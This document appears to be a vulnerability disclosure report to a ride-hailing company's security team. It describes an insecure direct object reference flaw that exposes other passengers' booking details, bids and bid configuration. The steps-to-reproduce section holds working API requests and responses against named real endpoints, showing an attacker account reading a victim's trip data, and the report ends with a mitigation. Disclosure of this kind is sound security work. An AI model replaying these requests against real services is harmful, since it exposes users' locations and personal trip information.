Broken Access Control (IDOR) in Booking Detail and Bids Could Leads to Sensitive Information Disclosure

## Summary: Dear Security Team, I hope this report finds you well, I would like to report an issue where a malicious user could see other users booking detail, bids information & bids config. The vulnerable URL endpoint are: ```text 1. GET https://api.bykea.net/api/v1/bookings/{{booking_id}}?_id={{user_id2}}&token_id={{access_token2}} 2. GET https://api.bykea.net/api/v2/bids/{{booking_id}}?_id={{user_id2}}&token_id={{access_token2}} 3. GET https://boleelagao.bykea.net/v1/config?lat={{latitute}}&lng={{longitude}}&service_code=23&trip_id={{booking_id}} ``` In this case, the `booking_id` in the request URL is vulnerable to IDOR. ## Steps To Reproduce: 1. Create 2 users `attacker` and `victim`, in this case, the `attacker` is a passenger with username `█████████` & the `victim` is a passenger with username `██████████`. 2. As `victim`, perform authentication to get `user_id` & `access_token`. 3. As `victim`, create a new trip. Request: ```json POST https://api.bykea.net/api/v1/trips/create Headers: User-Agent: BYKEA/1.0.169 (com.bykea.pk; build:21; iOS 15.8.0) Alamofire/1.0.169 X-App-Version: 1.0.169 Body: { "advertisement_id": "REDACTED", "token_id": "{{access_token}}", "pickup_info": { "lng": 67.883339799999931, "lat": 29.5500097, "address": "سبی, تØصیل سبی, ضلع سبی, سبی ڈویژن, بلوچستان, 82000, پاکستان" }, "trip": { "creator": "iOS", "service_code": 23, "lng": 67.883339799999931, "lat": 29.5500097, "customer_bid": 75 }, "dropoff_info": { "address": "Kurak, تØصیل سبی, ضلع سبی, سبی ڈویژن, بلوچستان, پاکستان", "lat": 29.573396420702664, "lng": 67.898040153086185 }, "_id": "{{user_id}}" } ``` Response: ```json { "code": 200, "success": true, "message": "Trip creation successful", "data": { "trip_id": "███████", "trip_no": "PKX████████", "passenger_id": "██████████", "dt": "2024-02-15T13:49:44.841Z", "link": "https://track.bykea.net/PKX██████", "nc": true } } ``` We successfully created a new trip/ booking with id `██████`. 4. Now as `attacker`, perform authentication to get `user_id2` & `access_token2`. 5. As `attacker`, perform a request to the booking detail API endpoint. Request: ```json GET https://api.bykea.net/api/v1/bookings/███?_id={{user_id2}}&token_id={{access_token2}} Headers: User-Agent: BYKEA/1.0.169 (com.bykea.pk; build:21; iOS 15.8.0) Alamofire/1.0.169 X-App-Version: 1.0.169 ``` Response: ```json { "code": 200, "success": true, "message": "Successfully loaded booking details", "data": { "_id": "█████", "times": { "total_est": 480 }, "distances": { "total_est": 3241 }, "fare": { "actual": 75, "upper": 80, "lower": 66, "pre_actual": 81 }, "factors": { "areaFactor": 1, "profileFactor": 0.92 }, "shipper_feedback": false, "picker_feedback": false, "consignee_feedback": false, "parcel_insurance": false, "return_trip": false, "trip_no": "PKX██████", "trip_type": "Sawari", "is_deleted": false, "is_verified": false, "est_fare": "81", "est": 75, "isDispatcher": false, "isDropOffInitial": false, "isPromo": false, "est_distance": 0, "creator_type": "iOS", "is_cod": false, "received_by_name": "", "received_by_phone": "", "received_by_cnic": "", "decision": [], "rule_ids": [ "███", "█████████" ], "cart_items": [], "customer_insurance": false, "customer_voucher": false, "paid_by": "shipper", "passenger_id": "████████", "trip_status_code": 23, "curLat": "29.5500097", "curLng": "67.88333979999993", "pickup_lat": "29.5500097", "pickup_lng": "67.88333979999993", "start_address": "سبی, تحصیل سبی, ضلع سبی, سبی ڈویژن, بلوچستان, 82000, پاکستان", "end_lat": "29.573396420702664", "end_lng": "67.89804015308619", "end_address": "Kurak, تحصیل سبی, ضلع سبی, سبی ڈویژن, بلوچستان, پاکستان", "dropoff_lat": "29.573396420702664", "dropoff_lng": "67.89804015308619", "dropoff_address": "Kurak, تحصیل سبی, ضلع سبی, سبی ڈویژن, بلوچستان, پاکستان", "customer_bid": 75, "extra_params": { "customer_app_version": "1.0.169", "rebooking_count": 0, "is_passenger_block": false, "searchViaScore": true }, "status": "cancelled", "session": "█████", "city": "643cb7378675551df33df5ab", "edt": "2024-02-15T13:49:44.841Z", "fare_factor": 0.92, "order_id": "█████████", "created_at": "2024-02-15T08:44:44.997Z", "trip_number": 170955617, "__v": 0, "link": "https://track.bykea.net/PKX███████", "rules": { "onExpire": "sendToLoadboard", "onCancelByPartner": "reopenOnLoadboard", "onCancelByCustomer": "cancelOnLoadboard" }, "updated_at": "2024-02-15T08:44:45.054Z", "discounted_fare": 81, "eligibleForDropoffDiscount": true, "insurance_amount": 0, "cancel_by": "Customer", "cancel_reason": "No Partner is available", "cancelled_at": "2024-02-15T08:45:21.657Z" } } ``` As we can see, we are able to retrieve the booking details of the `victim`. 6. As `attacker`, retrieve bids information of the `victim` Request: ```json GET https://api.bykea.net/api/v2/bids/████████?_id={{user_id2}}&token_id={{access_token2}} Headers: User-Agent: BYKEA/1.0.169 (com.bykea.pk; build:21; iOS 15.8.0) Alamofire/1.0.169 X-App-Version: 1.0.169 ``` Response: ```json { "code": 200, "success": true, "data": { "bids": [], "dt": 1707988055001, "is_discounted": false } } ``` As we can see, we can retrieve bid information from the booking of the `victim`. In this case, it's empty since I canceled the booking, but in a real-life scenario, it should be filled up with bids from the partner/ driver. 7. As `attacker`, retrieve bids config from the booking of the `victim`. Request: ```json GET https://boleelagao.bykea.net/v1/config?lat=29.5500097&lng=67.88333979999993&service_code=23&trip_id=██████ Headers: X-Lb-User-Id: {{user_id2}} X-Lb-User-Token: {{access_token2}} ``` Response: ```json { "code": 200, "message": "success", "data": { "bid_values": [ 20, 40, 60, 80, 100, 120, 140, 160, 180, 200 ], "durations": [ 3, 3, 3 ], "hash": "██████████" } } ``` ## Mitigation For the fix, this can be done by checking whether the booking/ trip `id` is owned by the logged-in user, by checking from their access token. ## Supporting Material/References: - [[MITRE] CWE-639: Insecure Direct Object Reference (IDOR)](https://cwe.mitre.org/data/definitions/639.html) - [[PortSwigger] Insecure direct object references (IDOR)](https://portswigger.net/web-security/access-control/idor) ## Impact 1. Attacker could see sensitive information from other users booking details, such as `pickup location`, `drop-off location`, `phone`, `tracking`, etc. 2. Attacker could see bids information from other users booking details. 3. Attacker could see bids config from other users booking details.